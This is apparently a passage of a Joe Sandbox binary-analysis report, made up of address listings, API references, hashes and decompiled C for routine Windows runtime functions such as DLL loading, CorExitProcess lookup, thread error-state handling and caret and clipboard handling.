                          0x00bcee87
                          0x00bcee89
                          0x00bcee8b
                          0x00bcee8b
                          0x00bcee8b
                          0x00bcee8e
                          0x00bcee8e
                          0x00bcee95
                          0x00bcee97
                          0x00000000
                          0x00bcee9d
                          0x00bcee9d
                          0x00bceea1
                          0x00bceea5
                          0x00bceea5
                          0x00bceea7
                          0x00bceea9
                          0x00bceeab
                          0x00bceead
                          0x00bceead
                          0x00bceead
                          0x00bceeb0
                          0x00bceeb0
                          0x00bceeb7
                          0x00bceeb9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bceeb9
                          0x00bcee97
                          0x00bcee75
                          0x00bcee53
                          0x00000000
                          0x00000000
                          0x00bcf245
                          0x00bcf245
                          0x00bcf248
                          0x00bcf24b
                          0x00000000
                          0x00bcf251
                          0x00bcf251
                          0x00bcf254
                          0x00bcf258
                          0x00bcf258
                          0x00bcf25a
                          0x00bcf25c
                          0x00bcf25e
                          0x00bcf260
                          0x00bcf260
                          0x00bcf260
                          0x00bcf263
                          0x00bcf263
                          0x00bcf26a
                          0x00bcf26c
                          0x00000000
                          0x00bcf272
                          0x00bcf272
                          0x00bcf276
                          0x00bcf27a
                          0x00bcf27a
                          0x00bcf27c
                          0x00bcf27e
                          0x00bcf280
                          0x00bcf282
                          0x00bcf282
                          0x00bcf282
                          0x00bcf285
                          0x00bcf285
                          0x00bcf28c
                          0x00bcf28e
                          0x00000000
                          0x00bcf294
                          0x00bcf294
                          0x00bcf298
                          0x00bcf29c
                          0x00bcf29c
                          0x00bcf29e
                          0x00bcf2a0
                          0x00bcf2a2
                          0x00bcf2a4
                          0x00bcf2a4
                          0x00bcf2a4
                          0x00bcf2a7
                          0x00bcf2a7
                          0x00bcf2ae
                          0x00bcf2b0
                          0x00000000
                          0x00bcf2b6
                          0x00bcf2b6
                          0x00bcf2ba
                          0x00bcf2be
                          0x00bcf2be
                          0x00bcf2c0
                          0x00bcf2c2
                          0x00bcf2c4
                          0x00bcf2c6
                          0x00bcf2c6
                          0x00bcf2c6
                          0x00bcf2c9
                          0x00bcf2c9
                          0x00bcf2d0
                          0x00bcf2d2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bcf2d2
                          0x00bcf2b0
                          0x00bcf28e
                          0x00bcf26c
                          0x00000000
                          0x00000000
                          0x00bce584
                          0x00bce587
                          0x00bce58a
                          0x00000000
                          0x00bce590
                          0x00bce597
                          0x00bce597
                          0x00bce599
                          0x00bce59d
                          0x00bce59f
                          0x00bce59f
                          0x00bce5a2
                          0x00bce5a2
                          0x00bce5a9
                          0x00bce5ab
                          0x00bce5b9
                          0x00bce5b9
                          0x00bce5bb
                          0x00bce5bf
                          0x00bce5c1
                          0x00bce5c1
                          0x00bce5c4
                          0x00bce5c4
                          0x00bce5cb
                          0x00bce5cd
                          0x00bce5db
                          0x00bce5db
                          0x00bce5dd
                          0x00bce5e1
                          0x00bce5e3
                          0x00bce5e3
                          0x00bce5e6
                          0x00bce5e6
                          0x00bce5ed
                          0x00bce5ef
                          0x00bce5fd
                          0x00bce5fd
                          0x00bce5ff
                          0x00bce603
                          0x00bce605
                          0x00bce605
                          0x00bce608
                          0x00bce608
                          0x00bce60f
                          0x00bce611
                          0x00000000
                          0x00000000
                          0x00bce611
                          0x00bce5ef
                          0x00bce5cd
                          0x00bce5ab
                          0x00000000
                          0x00000000
                          0x00bce97f
                          0x00bce982
                          0x00bce985
                          0x00000000
                          0x00bce987
                          0x00bce987
                          0x00bce98a
                          0x00bce98e
                          0x00bce98e
                          0x00bce990
                          0x00bce992
                          0x00bce994
                          0x00bce996
                          0x00bce996
                          0x00bce996
                          0x00bce999
                          0x00bce999
                          0x00bce9a0
                          0x00bce9a2
                          0x00000000
                          0x00bce9a4
                          0x00bce9a4
                          0x00bce9a8
                          0x00bce9ac
                          0x00bce9ac
                          0x00bce9ae
                          0x00bce9b0
                          0x00bce9b2
                          0x00bce9b4
                          0x00bce9b4
                          0x00bce9b4
                          0x00bce9b7
                          0x00bce9b7
                          0x00bce9be
                          0x00bce9c0
                          0x00000000
                          0x00bce9c2
                          0x00bce9c2
                          0x00bce9c6
                          0x00bce9ca
                          0x00bce9ca
                          0x00bce9cc
                          0x00bce9ce
                          0x00bce9d0
                          0x00bce9d2
                          0x00bce9d2
                          0x00bce9d2
                          0x00bce9d5
                          0x00bce9d5
                          0x00bce9dc
                          0x00bce9de
                          0x00000000
                          0x00bce9e0
                          0x00bce9e0
                          0x00bce9e4
                          0x00bce9e8
                          0x00bce9e8
                          0x00bce9ea
                          0x00bce9ec
                          0x00bce9ee
                          0x00bce9f0
                          0x00bce9f0
                          0x00bce9f0
                          0x00bce9f3
                          0x00bce9f3
                          0x00bce9fa
                          0x00bce9fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bce9fc
                          0x00bce9de
                          0x00bce9c0
                          0x00bce9a2
                          0x00000000
                          0x00000000
                          0x00bced99
                          0x00bced9c
                          0x00bced9f
                          0x00000000
                          0x00bceda5
                          0x00bceda5
                          0x00bceda8
                          0x00bcedac
                          0x00bcedac
                          0x00bcedae
                          0x00bcedb0
                          0x00bcedb2
                          0x00bcedb4
                          0x00bcedb4
                          0x00bcedb4
                          0x00bcedb7
                          0x00bcedb7
                          0x00bcedbe
                          0x00bcedc0
                          0x00000000
                          0x00bcedc6
                          0x00bcedc6
                          0x00bcedca
                          0x00bcedce
                          0x00bcedce
                          0x00bcedd0
                          0x00bcedd2
                          0x00bcedd4
                          0x00bcedd6
                          0x00bcedd6
                          0x00bcedd6
                          0x00bcedd9
                          0x00bcedd9
                          0x00bcede0
                          0x00bcede2
                          0x00000000
                          0x00bcede8
                          0x00bcede8
                          0x00bcedec
                          0x00bcedf0
                          0x00bcedf0
                          0x00bcedf2
                          0x00bcedf4
                          0x00bcedf6
                          0x00bcedf8
                          0x00bcedf8
                          0x00bcedf8
                          0x00bcedfb
                          0x00bcedfb
                          0x00bcee02
                          0x00bcee04
                          0x00000000
                          0x00bcee0a
                          0x00bcee0a
                          0x00bcee0e
                          0x00bcee12
                          0x00bcee12
                          0x00bcee14
                          0x00bcee16
                          0x00bcee18
                          0x00bcee1a
                          0x00bcee1a
                          0x00bcee1a
                          0x00bcee1d
                          0x00bcee1d
                          0x00bcee24
                          0x00bcee26
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bcee26
                          0x00bcee04
                          0x00bcede2
                          0x00bcedc0
                          0x00000000
                          0x00000000
                          0x00bcf1b2
                          0x00bcf1b5
                          0x00bcf1b8
                          0x00000000
                          0x00bcf1be
                          0x00bcf1be
                          0x00bcf1c1
                          0x00bcf1c5
                          0x00bcf1c5
                          0x00bcf1c7
                          0x00bcf1c9
                          0x00bcf1cb
                          0x00bcf1cd
                          0x00bcf1cd
                          0x00bcf1cd
                          0x00bcf1d0
                          0x00bcf1d0
                          0x00bcf1d7
                          0x00bcf1d9
                          0x00000000
                          0x00bcf1df
                          0x00bcf1df
                          0x00bcf1e3
                          0x00bcf1e7
                          0x00bcf1e7
                          0x00bcf1e9
                          0x00bcf1eb
                          0x00bcf1ed
                          0x00bcf1ef
                          0x00bcf1ef
                          0x00bcf1ef
                          0x00bcf1f2
                          0x00bcf1f2
                          0x00bcf1f9
                          0x00bcf1fb
                          0x00000000
                          0x00bcf201
                          0x00bcf201
                          0x00bcf205
                          0x00bcf209
                          0x00bcf209
                          0x00bcf20b
                          0x00bcf20d
                          0x00bcf20f
                          0x00bcf211
                          0x00bcf211
                          0x00bcf211
                          0x00bcf214
                          0x00bcf214
                          0x00bcf21b
                          0x00bcf21d
                          0x00000000
                          0x00bcf223
                          0x00bcf223
                          0x00bcf227
                          0x00bcf22b
                          0x00bcf22b
                          0x00bcf22d
                          0x00bcf22f
                          0x00bcf231
                          0x00bcf233
                          0x00bcf233
                          0x00bcf233
                          0x00bcf236
                          0x00bcf236
                          0x00bcf23d
                          0x00bcf23f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bcf23f
                          0x00bcf21d
                          0x00bcf1fb
                          0x00bcf1d9
                          0x00000000
                          0x00000000
                          0x00bce57d
                          0x00bce0bf
                          0x00bce0b6
                          0x00bce0ad
                          0x00bce0a4
                          0x00bcf685
                          0x00bcf688
                          0x00bcdfc2
                          0x00000000
                          0x00bcdfc2
                          0x00bcdfc0
                          0x00bcdfbe
                          0x00000000
                          0x00bcdfc7
                          0x00bcdfc7
                          0x00bcdfc9
                          0x00bcdfd0
                          0x00000000
                          0x00bcdfd2
                          0x00000000
                          0x00bcdfd0
                          0x00bcdf95
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 00BCDF67
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BCDF6F
                          • _ValidateLocalCookies.LIBCMT ref: 00BCDFF8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00BCE023
                          • _ValidateLocalCookies.LIBCMT ref: 00BCE078
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 52658300be47eda0dca1d2e4686ce0e011764d4c074fc2c7c776cb1593d1c79e
                          • Instruction ID: d43bddc3ec099c488a37d2259c18c5a3b16cea8ba4b9c742a4f4091b3897fad5
                          • Opcode Fuzzy Hash: 52658300be47eda0dca1d2e4686ce0e011764d4c074fc2c7c776cb1593d1c79e
                          • Instruction Fuzzy Hash: 99419F34A002499BCF10DF68C885B9EBBF5EF44324F1481EAE915AB392D775EA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC99B0 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CaretFocus$HideInvertRectReleaseShow
                          • String ID:
                          • API String ID: 4235554027-0
                          • Opcode ID: 200ef63190914c61e152883235fc9517f4b8452215a76c53ca465a1f1600c3a8
                          • Instruction ID: 1ba0e7d4c5f3f789ca9cfffa44f4b80436c1ef7889a2e123fb9f03cc63f8acae
                          • Opcode Fuzzy Hash: 200ef63190914c61e152883235fc9517f4b8452215a76c53ca465a1f1600c3a8
                          • Instruction Fuzzy Hash: 00318475A04209DFDB04DFA8D589AAD7BF0EF08311F1584A9F8899B350DB34EA84CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD23C9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD23C9(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0xbe60b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0xbdcae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0xbe60b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0xbe60b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00BD4AB9(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00BD4AB9(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                          0x00bd23d2
                          0x00bd2467
                          0x00bd23da
                          0x00bd23dc
                          0x00bd23e6
                          0x00bd23eb
                          0x00bd23f8
                          0x00bd240d
                          0x00bd2411
                          0x00bd2477
                          0x00bd247c
                          0x00bd2483
                          0x00bd2487
                          0x00bd248a
                          0x00bd248a
                          0x00bd2490
                          0x00bd2490
                          0x00bd2472
                          0x00bd2476
                          0x00bd2476
                          0x00bd2413
                          0x00bd241c
                          0x00bd2455
                          0x00bd2462
                          0x00bd2464
                          0x00bd2464
                          0x00000000
                          0x00bd2464
                          0x00bd2426
                          0x00bd242b
                          0x00bd2430
                          0x00000000
                          0x00000000
                          0x00bd243a
                          0x00bd243f
                          0x00bd2444
                          0x00000000
                          0x00000000
                          0x00bd2449
                          0x00bd244f
                          0x00bd2453
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd2453
                          0x00bd23f0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd23f6
                          0x00bd2470
                          0x00000000

                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00BD24D6,?,00BD0FC5,00000000,00000000), ref: 00BD248A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: c5130dce7a706f6a3657d8c1ea58cd06cda209219721de1e9569e97cf233c39a
                          • Instruction ID: f7e69512953cfedd7b15dcdb74bfc31a322f194dd2ffb65824cdd713eb94e97b
                          • Opcode Fuzzy Hash: c5130dce7a706f6a3657d8c1ea58cd06cda209219721de1e9569e97cf233c39a
                          • Instruction Fuzzy Hash: ED213031A002D1A7C7319B65DCC4B5AB7E8DB21770F2081A2EE16A7390FB70ED00C9D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD1CDC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E00BD1CDC(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xbe4064 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00BD6026(_t13,  *0xbe4064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00BD6061(_t14,  *0xbe4064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00BD0FA2();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00BD6061(_t18,  *0xbe4064, 0);
								} else {
									_t8 = E00BD6061(_t18,  *0xbe4064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00BD0FAD(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                          0x00bd1cdc
                          0x00bd1ce3
                          0x00bd1cf6
                          0x00bd1cfd
                          0x00bd1cff
                          0x00bd1d03
                          0x00bd1d1c
                          0x00bd1d1c
                          0x00bd1d05
                          0x00bd1d07
                          0x00bd1d1a
                          0x00bd1d21
                          0x00bd1d2a
                          0x00bd1d2d
                          0x00bd1d30
                          0x00bd1d44
                          0x00bd1d44
                          0x00bd1d4d
                          0x00bd1d32
                          0x00bd1d39
                          0x00bd1d3f
                          0x00bd1d42
                          0x00bd1d56
                          0x00bd1d58
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd1d42
                          0x00bd1d5b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd1d1a
                          0x00bd1d07
                          0x00bd1d63
                          0x00bd1d6d
                          0x00bd1ce5
                          0x00bd1ce7
                          0x00bd1ce7

                          APIs
                          • GetLastError.KERNEL32(?,?,00BD1CD3,00BCDD93,00BCD8EB), ref: 00BD1CEA
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BD1CF8
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD1D11
                          • SetLastError.KERNEL32(00000000,00BD1CD3,00BCDD93,00BCD8EB), ref: 00BD1D63
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 7f7eb50f84688098c6d122e2e5da1652e6939e08bebcde31cacecb1e10f6e33a
                          • Instruction ID: 867a7ba8e3e5aa3be75b6327eb804cfc3a0867792b050e285f93e4de0492c8aa
                          • Opcode Fuzzy Hash: 7f7eb50f84688098c6d122e2e5da1652e6939e08bebcde31cacecb1e10f6e33a
                          • Instruction Fuzzy Hash: 550184322093617EA73427BD7DC6666ABD5DB5277473006FBF6214A2F2FF214C415244
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCB480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00BC9824), ref: 00BCB4B3
                          • DestroyCaret.USER32 ref: 00BCB4C6
                          • DeleteObject.GDI32 ref: 00BCB4EE
                          • CreateBitmap.GDI32 ref: 00BCB69B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                          • String ID: d
                          • API String ID: 3626877506-2564639436
                          • Opcode ID: d032eefba288bab0aca1350d3e037e5b5b6038351d7fd2f784f2cf588b4e3ed7
                          • Instruction ID: e5931a86a3d0d93d5c12d146f5d5436605c5f0f1af399cd618b8df4789f67631
                          • Opcode Fuzzy Hash: d032eefba288bab0aca1350d3e037e5b5b6038351d7fd2f784f2cf588b4e3ed7
                          • Instruction Fuzzy Hash: 5671AE74A042199FCB04DF58C099FADBBF1BB48315F1584A9E889EB362D735E980CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC33D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: System
                          • String ID: `
                          • API String ID: 3470857405-2679148245
                          • Opcode ID: 11ce11521cc4d3f66aab56aee15c3bc14f0ed0eada4ccacd06648ba8595bfb75
                          • Instruction ID: c4cfbd7a24dc6f9e9020593a6ade215b8a236c606fabb0399421e821c1353cf0
                          • Opcode Fuzzy Hash: 11ce11521cc4d3f66aab56aee15c3bc14f0ed0eada4ccacd06648ba8595bfb75
                          • Instruction Fuzzy Hash: 53413FB4104209AFD740DF18D598B9ABBE0FB48314F01C49AEC688F362D7B9D948DF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD007C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 25%
                          			E00BD007C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0xbe4050; // 0xbb40e64e
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0xbdaf96, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0xbe7000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                          0x00bd0091
                          0x00bd009c
                          0x00bd00a2
                          0x00bd00a6
                          0x00bd00b1
                          0x00bd00b9
                          0x00bd00c3
                          0x00bd00c9
                          0x00bd00cd
                          0x00bd00d4
                          0x00bd00da
                          0x00bd00da
                          0x00bd00cd
                          0x00bd00e0
                          0x00bd00e5
                          0x00bd00e5
                          0x00bd00ee
                          0x00bd00f8

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00BDAF96,000000FF,?,00BD0146,00BCFFE1,?,00BD01E2,00000000), ref: 00BD00B1
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD00C3
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00BDAF96,000000FF,?,00BD0146,00BCFFE1,?,00BD01E2,00000000), ref: 00BD00E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 774bf299e1ca365de63391437ac008a1176b2c033988d5fca75a9e0c266b7996
                          • Instruction ID: 8f71affda13cd39ab6428780e18a66e40d0630e9c41f0e8a0694ca5ba98b48a0
                          • Opcode Fuzzy Hash: 774bf299e1ca365de63391437ac008a1176b2c033988d5fca75a9e0c266b7996
                          • Instruction Fuzzy Hash: 34018F31954659EFCB129B54DC49FAEBBF8FB04B15F004A66E811A66A0EB749900CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCA4B0 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: EnableItemMenu$AvailableClipboardFormat
                          • String ID:
                          • API String ID: 4217543366-0
                          • Opcode ID: 30633108bab1cf2227c3af9f5598104b8b413a38a1367425fbee211e26d089b3
                          • Instruction ID: 519e69394b5afae3bbfa53aaf3eac785b31213a3a449027c427017874e93d91a
                          • Opcode Fuzzy Hash: 30633108bab1cf2227c3af9f5598104b8b413a38a1367425fbee211e26d089b3
                          • Instruction Fuzzy Hash: 83119874605204AFD744EF68D59979EBBE0EB84701F10C82DFC898B394DB74D8849B56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD7F07 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E00BD7F07(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E00BD1CCE(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00BD1CCE(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E00BD436E(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E00BD421E(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
